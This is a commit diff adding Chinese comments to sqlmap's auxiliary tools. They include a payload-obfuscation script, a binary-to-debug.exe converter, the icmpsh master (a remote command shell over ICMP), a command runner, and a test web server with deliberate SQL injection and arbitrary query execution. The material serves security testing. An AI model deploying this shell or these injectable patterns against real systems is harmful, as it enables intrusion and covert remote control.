liguanwei's change

pull/14/head
liguanwei 11 months ago committed by Gitea
parent c06a3885f8
commit 6bc0096215

@ -7,82 +7,99 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from __future__ import print_function from __future__ import print_function # 兼容 Python 2 和 3 的 print 函数
import os import os
import struct import struct
import sys import sys
import zlib import zlib # 用于数据压缩和解压缩
from optparse import OptionError from optparse import OptionError
from optparse import OptionParser from optparse import OptionParser
# 在 Python 3 中定义 xrange 和 ord 的兼容
if sys.version_info >= (3, 0): if sys.version_info >= (3, 0):
xrange = range xrange = range # 使用 Python 3 的 range
ord = lambda _: _ ord = lambda _: _ # 在 Python 3 中直接使用字符
KEY = b"E6wRbVhD0IBeCiGJ" KEY = b"E6wRbVhD0IBeCiGJ" # 定义加密/解密的密钥
def xor(message, key): def xor(message, key):
"""执行 XOR 操作,返回加密或解密后的字节序列。"""
# 对 message 的每个字节进行 XOR 运算,并返回字节串
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message))) return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
def cloak(inputFile=None, data=None): def cloak(inputFile=None, data=None):
"""对输入文件或数据进行加密和压缩。"""
if data is None: if data is None:
# 如果没有提供数据,则读取文件内容
with open(inputFile, "rb") as f: with open(inputFile, "rb") as f:
data = f.read() data = f.read() # 以二进制模式读取文件数据
# 对数据进行压缩后再使用 XOR 加密
return xor(zlib.compress(data), KEY) return xor(zlib.compress(data), KEY)
def decloak(inputFile=None, data=None): def decloak(inputFile=None, data=None):
"""对输入文件或数据进行解密和解压缩。"""
if data is None: if data is None:
# 如果没有提供数据,则读取文件内容
with open(inputFile, "rb") as f: with open(inputFile, "rb") as f:
data = f.read() data = f.read()
try: try:
# 首先对数据进行 XOR 解密,然后解压缩
data = zlib.decompress(xor(data, KEY)) data = zlib.decompress(xor(data, KEY))
except Exception as ex: except Exception as ex:
# 如果解压缩过程中发生异常,打印错误信息并退出
print(ex) print(ex)
print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile) print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
sys.exit(1) sys.exit(1)
finally: finally:
f.close() f.close() # 确保文件流被关闭
return data return data # 返回解密后的数据
def main(): def main():
usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0] """主函数,负责解析命令行参数并执行加密或解密操作。"""
parser = OptionParser(usage=usage, version='0.2') usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0] # 使用说明
parser = OptionParser(usage=usage, version='0.2') # 创建 OptionParser 对象
try: try:
parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') # 添加命令行选项
parser.add_option('-i', dest='inputFile', help='Input file') parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') # 解密选项
parser.add_option('-o', dest='outputFile', help='Output file') parser.add_option('-i', dest='inputFile', help='Input file') # 输入文件选项
parser.add_option('-o', dest='outputFile', help='Output file') # 输出文件选项
(args, _) = parser.parse_args() (args, _) = parser.parse_args() # 解析命令行参数
if not args.inputFile: if not args.inputFile:
parser.error('Missing the input file, -h for help') parser.error('Missing the input file, -h for help') # 如果未提供输入文件,则报错
except (OptionError, TypeError) as ex: except (OptionError, TypeError) as ex:
parser.error(ex) parser.error(ex) # 捕获解析错误
# 检查输入文件是否存在
if not os.path.isfile(args.inputFile): if not os.path.isfile(args.inputFile):
print('ERROR: the provided input file \'%s\' is non existent' % args.inputFile) print('ERROR: the provided input file \'%s\' is non existent' % args.inputFile)
sys.exit(1) sys.exit(1)
# 根据是否需要解密选择处理函数
if not args.decrypt: if not args.decrypt:
data = cloak(args.inputFile) data = cloak(args.inputFile) # 加密文件内容
else: else:
data = decloak(args.inputFile) data = decloak(args.inputFile) # 解密文件内容
# 如果未指定输出文件名,则根据是否解密自动生成
if not args.outputFile: if not args.outputFile:
if not args.decrypt: if not args.decrypt:
args.outputFile = args.inputFile + '_' args.outputFile = args.inputFile + '_' # 添加后缀表示加密
else: else:
args.outputFile = args.inputFile[:-1] args.outputFile = args.inputFile[:-1] # 移除后缀表示解密
# 写入结果到输出文件
f = open(args.outputFile, 'wb') f = open(args.outputFile, 'wb')
f.write(data) f.write(data) # 写入数据
f.close() f.close() # 关闭文件
if __name__ == '__main__': if __name__ == '__main__':
main() main() # 程序入口

@ -7,7 +7,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from __future__ import print_function from __future__ import print_function # 兼容 Python 2 和 3 的 print 函数
import os import os
import sys import sys
@ -16,81 +16,97 @@ from optparse import OptionError
from optparse import OptionParser from optparse import OptionParser
def convert(inputFile): def convert(inputFile):
fileStat = os.stat(inputFile) """将给定的二进制输入文件转换为 ASCII 调试脚本。"""
fileSize = fileStat.st_size fileStat = os.stat(inputFile) # 获取文件状态
fileSize = fileStat.st_size # 获取文件大小
# 检查文件大小是否超过 65280 字节(可调试的最大限制)
if fileSize > 65280: if fileSize > 65280:
print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile) print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile)
sys.exit(1) sys.exit(1) # 如果文件太大,退出程序
script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) # 开始构建调试脚本
script += "%x\nf 0100 ffff 00\n" % fileSize script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) # 设置脚本名称
scrString = "" script += "%x\nf 0100 ffff 00\n" % fileSize # 写入文件大小信息
counter = 256 scrString = "" # 用于构建写入命令
counter2 = 0 counter = 256 # 地址计数器从 256 开始
counter2 = 0 # 0 计数器,用于控制输出的字符数
# 读取输入文件的二进制内容
fp = open(inputFile, "rb") fp = open(inputFile, "rb")
fileContent = fp.read() fileContent = fp.read() # 读取所有内容
# 遍历文件的每个字节
for fileChar in fileContent: for fileChar in fileContent:
# 在 Python 3 中字符是字节,直接使用;在 Python 2 中需要使用 ord() 函数
unsignedFileChar = fileChar if sys.version_info >= (3, 0) else ord(fileChar) unsignedFileChar = fileChar if sys.version_info >= (3, 0) else ord(fileChar)
# 如果字符不是空字节0则进行处理
if unsignedFileChar != 0: if unsignedFileChar != 0:
counter2 += 1 counter2 += 1 # 增加有效字符计数
if not scrString: if not scrString:
# 如果 scrString 为空,开始创建新的写入命令
scrString = "e %0x %02x" % (counter, unsignedFileChar) scrString = "e %0x %02x" % (counter, unsignedFileChar)
else: else:
# 否则,将字符附加到 scrString 中
scrString += " %02x" % unsignedFileChar scrString += " %02x" % unsignedFileChar
elif scrString: elif scrString:
# 如果遇到空字节,且 scrString 中有内容,需要把当前 scrString 添加到脚本
script += "%s\n" % scrString script += "%s\n" % scrString
scrString = "" scrString = "" # 清空 scrString
counter2 = 0 counter2 = 0 # 重置有效字符计数
counter += 1 counter += 1 # 增加地址计数器
# 每 20 个有效字符输出一次
if counter2 == 20: if counter2 == 20:
script += "%s\n" % scrString script += "%s\n" % scrString # 将当前 scrString 加入脚本
scrString = "" scrString = "" # 清空 scrString
counter2 = 0 counter2 = 0 # 重置计数
# 完成脚本,添加结束指令
script += "w\nq\n" script += "w\nq\n"
return script return script # 返回生成的调试脚本
def main(inputFile, outputFile): def main(inputFile, outputFile):
"""主功能,处理文件输入输出。"""
# 检查输入文件是否是常规文件
if not os.path.isfile(inputFile): if not os.path.isfile(inputFile):
print("ERROR: the provided input file '%s' is not a regular file" % inputFile) print("ERROR: the provided input file '%s' is not a regular file" % inputFile)
sys.exit(1) sys.exit(1) # 如果不是,退出程序
# 调用转换函数
script = convert(inputFile) script = convert(inputFile)
# 如果提供了输出文件,写入脚本
if outputFile: if outputFile:
fpOut = open(outputFile, "w") with open(outputFile, "w") as fpOut:
sys.stdout = fpOut sys.stdout = fpOut # 将标准输出重定向到输出文件
sys.stdout.write(script) sys.stdout.write(script) # 写入脚本内容
sys.stdout.close() sys.stdout.close() # 关闭文件
else: else:
print(script) print(script) # 如果没有输出文件,直接打印脚本
if __name__ == "__main__": if __name__ == "__main__":
usage = "%s -i <input file> [-o <output file>]" % sys.argv[0] usage = "%s -i <input file> [-o <output file>]" % sys.argv[0] # 程序用法说明
parser = OptionParser(usage=usage, version="0.1") parser = OptionParser(usage=usage, version="0.1") # 创建解析器
try: try:
parser.add_option("-i", dest="inputFile", help="Input binary file") # 添加命令行选项
parser.add_option("-i", dest="inputFile", help="Input binary file") # 输入文件
parser.add_option("-o", dest="outputFile", help="Output debug.exe text file") parser.add_option("-o", dest="outputFile", help="Output debug.exe text file") # 输出文件
(args, _) = parser.parse_args() (args, _) = parser.parse_args() # 解析参数
if not args.inputFile: if not args.inputFile:
parser.error("Missing the input file, -h for help") parser.error("Missing the input file, -h for help") # 必须提供输入文件
except (OptionError, TypeError) as ex: except (OptionError, TypeError) as ex:
parser.error(ex) parser.error(ex) # 捕获错误并报告
inputFile = args.inputFile inputFile = args.inputFile # 输入文件名
outputFile = args.outputFile outputFile = args.outputFile # 输出文件名
main(inputFile, outputFile) main(inputFile, outputFile) # 调用主函数

@ -5,7 +5,6 @@
# #
# Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com> # Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>
# #
#
# This program is free software: you can redistribute it and/or modify # This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by # it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or # the Free Software Foundation, either version 3 of the License, or
@ -28,117 +27,117 @@ def setNonBlocking(fd):
""" """
Make a file descriptor non-blocking Make a file descriptor non-blocking
""" """
import fcntl # 导入用于文件控制选项的库
import fcntl flags = fcntl.fcntl(fd, fcntl.F_GETFL) # 获取当前文件描述符的状态标志
flags = flags | os.O_NONBLOCK # 将非阻塞标志添加到当前标志
flags = fcntl.fcntl(fd, fcntl.F_GETFL) fcntl.fcntl(fd, fcntl.F_SETFL, flags) # 设置文件描述符为非阻塞模式
flags = flags | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
def main(src, dst): def main(src, dst):
"""主程序函数,用于设置 ICMP socket 和处理命令。"""
if sys.platform == "nt": if sys.platform == "nt":
sys.stderr.write('icmpsh master can only run on Posix systems\n') sys.stderr.write('icmpsh master can only run on Posix systems\n') # 检查是否在 Windows 上运行
sys.exit(255) sys.exit(255)
try: try:
from impacket import ImpactDecoder from impacket import ImpactDecoder # 导入 Impacket 库用于解析数据包
from impacket import ImpactPacket from impacket import ImpactPacket # 导入 Impacket 用于构建数据包
except ImportError: except ImportError:
sys.stderr.write('You need to install Python Impacket library first\n') sys.stderr.write('You need to install Python Impacket library first\n') # 检查是否安装 Impacket
sys.exit(255) sys.exit(255)
# Make standard input a non-blocking file # 将标准输入设置为非阻塞
stdin_fd = sys.stdin.fileno() stdin_fd = sys.stdin.fileno() # 获取标准输入的文件描述符
setNonBlocking(stdin_fd) setNonBlocking(stdin_fd)
# Open one socket for ICMP protocol # 为 ICMP 协议打开一个 socket
# A special option is set on the socket so that IP headers are included
# with the returned data
try: try:
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) # 创建原始 ICMP socket
except socket.error: except socket.error:
sys.stderr.write('You need to run icmpsh master with administrator privileges\n') sys.stderr.write('You need to run icmpsh master with administrator privileges\n') # 检查运行权限
sys.exit(1) sys.exit(1)
sock.setblocking(0) sock.setblocking(0) # 设置 socket 为非阻塞模式
sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # 启用 IP 头包含在发送包中
# Create a new IP packet and set its source and destination addresses # 创建一个新的 IP 包,设置源和目的地址
ip = ImpactPacket.IP() ip = ImpactPacket.IP()
ip.set_ip_src(src) ip.set_ip_src(src) # 设置源 IP
ip.set_ip_dst(dst) ip.set_ip_dst(dst) # 设置目标 IP
# Create a new ICMP packet of type ECHO REPLY # 创建一个新的 ICMP 包类型为回显应答ECHO REPLY
icmp = ImpactPacket.ICMP() icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHOREPLY) icmp.set_icmp_type(icmp.ICMP_ECHOREPLY)
# Instantiate an IP packets decoder # 实例化 IP 数据包解码器
decoder = ImpactDecoder.IPDecoder() decoder = ImpactDecoder.IPDecoder()
# 在无限循环中发送和接收命令
while True: while True:
try: try:
cmd = '' cmd = ''
# Wait for incoming replies # 等待输入的回复
if sock in select.select([sock], [], [])[0]: if sock in select.select([sock], [], [])[0]: # 监控 socket 是否可读
buff = sock.recv(4096) buff = sock.recv(4096) # 接收最大 4096 字节的数据
if 0 == len(buff): if 0 == len(buff):
# Socket remotely closed # 如果接收到的数据长度为 0说明对方关闭了 socket
sock.close() sock.close()
sys.exit(0) sys.exit(0)
# Packet received; decode and display it # 解析接收到的数据包
ippacket = decoder.decode(buff) ippacket = decoder.decode(buff) # 解码 IP 包
icmppacket = ippacket.child() icmppacket = ippacket.child() # 获取 ICMP 包
# If the packet matches, report it to the user # 检查 ICMP 数据包的源和目的地址以及类型
if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type():
# Get identifier and sequence number # 获取标识符和序列号
ident = icmppacket.get_icmp_id() ident = icmppacket.get_icmp_id()
seq_id = icmppacket.get_icmp_seq() seq_id = icmppacket.get_icmp_seq()
data = icmppacket.get_data_as_string() data = icmppacket.get_data_as_string() # 获取数据
if len(data) > 0: if len(data) > 0:
sys.stdout.write(data) sys.stdout.write(data) # 输出接收到的数据
# Parse command from standard input # 从标准输入读取命令
try: try:
cmd = sys.stdin.readline() cmd = sys.stdin.readline() # 读取用户输入的命令
except: except:
pass pass
if cmd == 'exit\n': if cmd == 'exit\n': # 如果输入为 'exit',退出循环
return return
# Set sequence number and identifier # 设置序列号和标识符,以便回复
icmp.set_icmp_id(ident) icmp.set_icmp_id(ident)
icmp.set_icmp_seq(seq_id) icmp.set_icmp_seq(seq_id)
# Include the command as data inside the ICMP packet # 将命令作为数据包含在 ICMP 包中
icmp.contains(ImpactPacket.Data(cmd)) icmp.contains(ImpactPacket.Data(cmd))
# Calculate its checksum # 计算 ICMP 包的校验和
icmp.set_icmp_cksum(0) icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1 icmp.auto_checksum = 1 # 自动计算校验和
# Have the IP packet contain the ICMP packet (along with its payload) # 将 ICMP 包插入到 IP 包中
ip.contains(icmp) ip.contains(icmp)
try: try:
# Send it to the target host # 发送数据包到目标主机
sock.sendto(ip.get_packet(), (dst, 0)) sock.sendto(ip.get_packet(), (dst, 0))
except socket.error as ex: except socket.error as ex:
sys.stderr.write("'%s'\n" % ex) sys.stderr.write("'%s'\n" % ex) # 输出错误信息
sys.stderr.flush() sys.stderr.flush()
except: except:
break break
if __name__ == '__main__': if __name__ == '__main__':
# 检查参数,确保提供了源 IP 和目标 IP
if len(sys.argv) < 3: if len(sys.argv) < 3:
msg = 'missing mandatory options. Execute as root:\n' msg = 'missing mandatory options. Execute as root:\n'
msg += './icmpsh-m.py <source IP address> <destination IP address>\n' msg += './icmpsh-m.py <source IP address> <destination IP address>\n'
sys.stderr.write(msg) sys.stderr.write(msg)
sys.exit(1) sys.exit(1)
main(sys.argv[1], sys.argv[2]) main(sys.argv[1], sys.argv[2]) # 调用主函数,传入源和目标 IP

@ -2,7 +2,7 @@
runcmd - a program for running command prompt commands runcmd - a program for running command prompt commands
Copyright (C) 2010 Miroslav Stampar Copyright (C) 2010 Miroslav Stampar
email: miroslav.stampar@gmail.com email: miroslav.stampar@gmail.com
This library is free software; you can redistribute it and/or This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either License as published by the Free Software Foundation; either
@ -25,22 +25,27 @@
#include <string> #include <string>
using namespace std; using namespace std;
int main(int argc, char* argv[]) int main(int argc, char* argv[])
{ {
FILE *fp; FILE *fp;
string cmd; string cmd;
for( int count = 1; count < argc; count++ ) // 从命令行参数获取命令并构建完整的命令字符串
cmd += " " + string(argv[count]); for (int count = 1; count < argc; count++)
cmd += " " + string(argv[count]); // 将每个参数添加到 cmd 字符串中,并用空格分隔
// 使用 _popen() 函数以只读的方式打开一个命令进程
fp = _popen(cmd.c_str(), "r"); fp = _popen(cmd.c_str(), "r");
// 检查文件指针是否有效
if (fp != NULL) { if (fp != NULL) {
char buffer[BUFSIZ]; char buffer[BUFSIZ]; // 声明一个缓冲区用于接收输出
// 读取命令的输出并将其写到标准输出
while (fgets(buffer, sizeof buffer, fp) != NULL) while (fgets(buffer, sizeof buffer, fp) != NULL)
fputs(buffer, stdout); fputs(buffer, stdout); // 将缓冲区的内容输出到控制台
} }
return 0; return 0;
} }

@ -3,28 +3,32 @@
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) # Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission # See the file 'LICENSE' for copying permission
# Removes duplicate entries in wordlist like files # Removes duplicate entries in wordlist-like files
from __future__ import print_function from __future__ import print_function # 确保使用 Python 3 的 print() 函数
import sys import sys # 导入系统模块,用于处理命令行参数和文件操作
if __name__ == "__main__": if __name__ == "__main__":
# 检查程序是否接收到至少一个命令行参数
if len(sys.argv) > 1: if len(sys.argv) > 1:
items = list() items = list() # 初始化一个列表用于存储唯一条目
# 打开指定的文件进行读取
with open(sys.argv[1], 'r') as f: with open(sys.argv[1], 'r') as f:
for item in f: for item in f: # 遍历文件中的每一行
item = item.strip() item = item.strip() # 去掉行首尾的空白字符
try: try:
str.encode(item) str.encode(item) # 尝试对字符串编码,确保内容是有效的字符串
if item in items: if item in items: # 检查条目是否已经在列表中
if item: if item: # 确保条目不为空
print(item) print(item) # 打印重复的条目
else: else:
items.append(item) items.append(item) # 如果条目不在列表中,则添加到列表
except: except:
pass pass # 捕获异常,继续处理下一个条目
# 以写入模式打开同一个文件,准备写入去重后的唯一条目
with open(sys.argv[1], 'w+') as f: with open(sys.argv[1], 'w+') as f:
f.writelines("\n".join(items)) f.writelines("\n".join(items)) # 将唯一条目写回文件,以换行符分隔

@ -6,25 +6,30 @@ import os
import sys import sys
def check(filepath): def check(filepath):
if filepath.endswith(".py"): # 检查给定路径的文件
content = open(filepath, "rb").read() if filepath.endswith(".py"): # 检查文件扩展名是否为 .py
pattern = "\n\n\n".encode("ascii") content = open(filepath, "rb").read() # 以二进制模式打开文件并读取全部内容
pattern = "\n\n\n".encode("ascii") # 定义一个二进制模式的换行符序列,表示三个换行符
# 检查内容中是否包含三个连续的换行符
if pattern in content: if pattern in content:
index = content.find(pattern) index = content.find(pattern) # 找到模式在内容中的第一个出现位置
# 打印文件路径和模式前后各 30 个字节的内容
print(filepath, repr(content[index - 30:index + 30])) print(filepath, repr(content[index - 30:index + 30]))
if __name__ == "__main__": if __name__ == "__main__":
try: try:
BASE_DIRECTORY = sys.argv[1] BASE_DIRECTORY = sys.argv[1] # 尝试获取命令行中指定的目录路径
except IndexError: except IndexError: # 如果没有指定目录参数
print("no directory specified, defaulting to current working directory") print("no directory specified, defaulting to current working directory")
BASE_DIRECTORY = os.getcwd() BASE_DIRECTORY = os.getcwd() # 使用当前工作目录作为默认目录
print("looking for *.py scripts in subdirectories of '%s'" % BASE_DIRECTORY) print("looking for *.py scripts in subdirectories of '%s'" % BASE_DIRECTORY)
# 遍历指定目录及其子目录中的所有文件
for root, dirs, files in os.walk(BASE_DIRECTORY): for root, dirs, files in os.walk(BASE_DIRECTORY):
# 如果路径中包含 "extra" 或 "thirdparty",则跳过该目录
if any(_ in root for _ in ("extra", "thirdparty")): if any(_ in root for _ in ("extra", "thirdparty")):
continue continue
for name in files: for name in files: # 遍历文件列表
filepath = os.path.join(root, name) filepath = os.path.join(root, name) # 构建文件的完整路径
check(filepath) check(filepath) # 调用 check 函数检查该文件

@ -17,29 +17,26 @@ import sys
import threading import threading
import traceback import traceback
# 检查 Python 版本
PY3 = sys.version_info >= (3, 0) PY3 = sys.version_info >= (3, 0)
UNICODE_ENCODING = "utf-8" UNICODE_ENCODING = "utf-8" # 定义 Unicode 编码
DEBUG = False DEBUG = False # 调试模式标志
if PY3: if PY3:
from http.client import INTERNAL_SERVER_ERROR # 导入 Python 3 中的 HTTP 相关模块
from http.client import NOT_FOUND from http.client import INTERNAL_SERVER_ERROR, NOT_FOUND, OK
from http.client import OK from http.server import BaseHTTPRequestHandler, HTTPServer
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from socketserver import ThreadingMixIn from socketserver import ThreadingMixIn
from urllib.parse import parse_qs from urllib.parse import parse_qs, unquote_plus
from urllib.parse import unquote_plus
else: else:
from BaseHTTPServer import BaseHTTPRequestHandler # 对于 Python 2导入相应的 HTTP 相关模块
from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from httplib import INTERNAL_SERVER_ERROR from httplib import INTERNAL_SERVER_ERROR, NOT_FOUND, OK
from httplib import NOT_FOUND
from httplib import OK
from SocketServer import ThreadingMixIn from SocketServer import ThreadingMixIn
from urlparse import parse_qs from urlparse import parse_qs
from urllib import unquote_plus from urllib import unquote_plus
# SQLite 模式定义,创建用户表并插入示例数据
SCHEMA = """ SCHEMA = """
CREATE TABLE users ( CREATE TABLE users (
id INTEGER, id INTEGER,
@ -54,9 +51,11 @@ SCHEMA = """
INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull'); INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');
""" """
# 定义监听地址和端口
LISTEN_ADDRESS = "localhost" LISTEN_ADDRESS = "localhost"
LISTEN_PORT = 8440 LISTEN_PORT = 8440
# 全局变量
_conn = None _conn = None
_cursor = None _cursor = None
_lock = None _lock = None
@ -68,13 +67,15 @@ def init(quiet=False):
global _cursor global _cursor
global _lock global _lock
# 在内存中创建 SQLite 数据库连接
_conn = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False) _conn = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False)
_cursor = _conn.cursor() _cursor = _conn.cursor() # 创建游标,用于执行 SQL 命令
_lock = threading.Lock() _lock = threading.Lock() # 创建线程锁,以处理多线程环境下的数据库访问
_cursor.executescript(SCHEMA) _cursor.executescript(SCHEMA) # 执行脚本以创建表并插入数据
if quiet: if quiet:
# 如果 quiet 为 True则禁止输出
global print global print
def _(*args, **kwargs): def _(*args, **kwargs):
@ -83,6 +84,7 @@ def init(quiet=False):
print = _ print = _
class ThreadingServer(ThreadingMixIn, HTTPServer): class ThreadingServer(ThreadingMixIn, HTTPServer):
# 允许多线程处理 HTTP 请求
def finish_request(self, *args, **kwargs): def finish_request(self, *args, **kwargs):
try: try:
HTTPServer.finish_request(self, *args, **kwargs) HTTPServer.finish_request(self, *args, **kwargs)
@ -91,13 +93,16 @@ class ThreadingServer(ThreadingMixIn, HTTPServer):
traceback.print_exc() traceback.print_exc()
class ReqHandler(BaseHTTPRequestHandler): class ReqHandler(BaseHTTPRequestHandler):
# 请求处理类
def do_REQUEST(self): def do_REQUEST(self):
# 处理请求,分割路径和查询字符串
path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "") path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
params = {} params = {}
if query: if query:
params.update(parse_qs(query)) params.update(parse_qs(query)) # 解析查询字符串为字典
# 检查是否出现恶意脚本
if "<script>" in unquote_plus(query): if "<script>" in unquote_plus(query):
self.send_response(INTERNAL_SERVER_ERROR) self.send_response(INTERNAL_SERVER_ERROR)
self.send_header("X-Powered-By", "Express") self.send_header("X-Powered-By", "Express")
@ -106,18 +111,25 @@ class ReqHandler(BaseHTTPRequestHandler):
self.wfile.write("CLOUDFLARE_ERROR_500S_BOX".encode(UNICODE_ENCODING)) self.wfile.write("CLOUDFLARE_ERROR_500S_BOX".encode(UNICODE_ENCODING))
return return
# 处理请求数据(如果有)
if hasattr(self, "data"): if hasattr(self, "data"):
if self.data.startswith('{') and self.data.endswith('}'): if self.data.startswith('{') and self.data.endswith('}'):
params.update(json.loads(self.data)) params.update(json.loads(self.data)) # JSON 数据
elif self.data.startswith('<') and self.data.endswith('>'): elif self.data.startswith('<') and self.data.endswith('>'):
params.update(dict((_[0], _[1].replace("&apos;", "'").replace("&quot;", '"').replace("&lt;", '<').replace("&gt;", '>').replace("&amp;", '&')) for _ in re.findall(r'name="([^"]+)" value="([^"]*)"', self.data))) # 解析 HTML 表单数据
params.update(dict((_[0], _[1].replace("&apos;", "'").replace("&quot;", '"')
.replace("&lt;", '<').replace("&gt;", '>').replace("&amp;", '&'))
for _ in re.findall(r'name="([^"]+)" value="([^"]*)"', self.data)))
else: else:
self.data = self.data.replace(';', '&') # Note: seems that Python3 started ignoring parameter splitting with ';' # 处理 URL 编码数据
self.data = self.data.replace(';', '&') # 兼容性处理
params.update(parse_qs(self.data)) params.update(parse_qs(self.data))
# 处理请求头参数
for name in self.headers: for name in self.headers:
params[name.lower()] = self.headers[name] params[name.lower()] = self.headers[name]
# 处理 Cookie 参数
if "cookie" in params: if "cookie" in params:
for part in params["cookie"].split(';'): for part in params["cookie"].split(';'):
part = part.strip() part = part.strip()
@ -125,14 +137,17 @@ class ReqHandler(BaseHTTPRequestHandler):
name, value = part.split('=', 1) name, value = part.split('=', 1)
params[name.strip()] = unquote_plus(value.strip()) params[name.strip()] = unquote_plus(value.strip())
# 将多值参数转换为单值
for key in params: for key in params:
if params[key] and isinstance(params[key], (tuple, list)): if params[key] and isinstance(params[key], (tuple, list)):
params[key] = params[key][-1] params[key] = params[key][-1]
self.url, self.params = path, params self.url, self.params = path, params # 存储 URL 和参数
if self.url == '/': if self.url == '/':
# 主页处理
if not any(_ in self.params for _ in ("id", "query")): if not any(_ in self.params for _ in ("id", "query")):
# 如果没有 ID 或查询参数,则显示主页面
self.send_response(OK) self.send_response(OK)
self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING) self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
self.send_header("Connection", "close") self.send_header("Connection", "close")
@ -142,27 +157,33 @@ class ReqHandler(BaseHTTPRequestHandler):
code, output = OK, "" code, output = OK, ""
try: try:
# 处理回显参数
if self.params.get("echo", ""): if self.params.get("echo", ""):
output += "%s<br>" % self.params["echo"] output += "%s<br>" % self.params["echo"]
if self.params.get("reflect", ""): if self.params.get("reflect", ""):
output += "%s<br>" % self.params.get("id") output += "%s<br>" % self.params.get("id")
with _lock: with _lock: # 使用锁来确保线程安全
if "query" in self.params: if "query" in self.params:
# 执行任意 SQL 查询
_cursor.execute(self.params["query"]) _cursor.execute(self.params["query"])
elif "id" in self.params: elif "id" in self.params:
# 通过 ID 查询用户
if "base64" in self.params: if "base64" in self.params:
_cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" % base64.b64decode("%s===" % self.params["id"], altchars=self.params.get("altchars")).decode()) _cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" %
base64.b64decode("%s===" % self.params["id"],
altchars=self.params.get("altchars")).decode())
else: else:
_cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" % self.params["id"]) _cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" % self.params["id"])
results = _cursor.fetchall() results = _cursor.fetchall() # 获取查询结果
output += "<b>SQL results:</b><br>\n" output += "<b>SQL results:</b><br>\n"
# 根据查询结果决定响应的状态码和内容
if self.params.get("code", ""): if self.params.get("code", ""):
if not results: if not results:
code = INTERNAL_SERVER_ERROR code = INTERNAL_SERVER_ERROR # 出错
else: else:
if results: if results:
output += "<table border=\"1\">\n" output += "<table border=\"1\">\n"
@ -175,15 +196,16 @@ class ReqHandler(BaseHTTPRequestHandler):
output += "</table>\n" output += "</table>\n"
else: else:
output += "no results found" output += "no results found" # 查询无结果
output += "</body></html>" output += "</body></html>"
except Exception as ex: except Exception as ex:
code = INTERNAL_SERVER_ERROR code = INTERNAL_SERVER_ERROR
# 捕获异常并返回错误信息
output = "%s: %s" % (re.search(r"'([^']+)'", str(type(ex))).group(1), ex) output = "%s: %s" % (re.search(r"'([^']+)'", str(type(ex))).group(1), ex)
# 发送响应
self.send_response(code) self.send_response(code)
self.send_header("Content-type", "text/html") self.send_header("Content-type", "text/html")
self.send_header("Connection", "close") self.send_header("Connection", "close")
@ -194,26 +216,30 @@ class ReqHandler(BaseHTTPRequestHandler):
self.end_headers() self.end_headers()
self.wfile.write(output if isinstance(output, bytes) else output.encode(UNICODE_ENCODING)) self.wfile.write(output if isinstance(output, bytes) else output.encode(UNICODE_ENCODING))
else: else:
# 对于未定义的路径返回 404
self.send_response(NOT_FOUND) self.send_response(NOT_FOUND)
self.send_header("Connection", "close") self.send_header("Connection", "close")
self.end_headers() self.end_headers()
def do_GET(self): def do_GET(self):
self.do_REQUEST() self.do_REQUEST() # 处理 GET 请求
def do_PUT(self): def do_PUT(self):
self.do_POST() self.do_POST() # 处理 PUT 请求
def do_HEAD(self): def do_HEAD(self):
self.do_REQUEST() self.do_REQUEST() # 处理 HEAD 请求
def do_POST(self): def do_POST(self):
# 处理 POST 请求
length = int(self.headers.get("Content-length", 0)) length = int(self.headers.get("Content-length", 0))
if length: if length:
# 读取请求体数据
data = self.rfile.read(length) data = self.rfile.read(length)
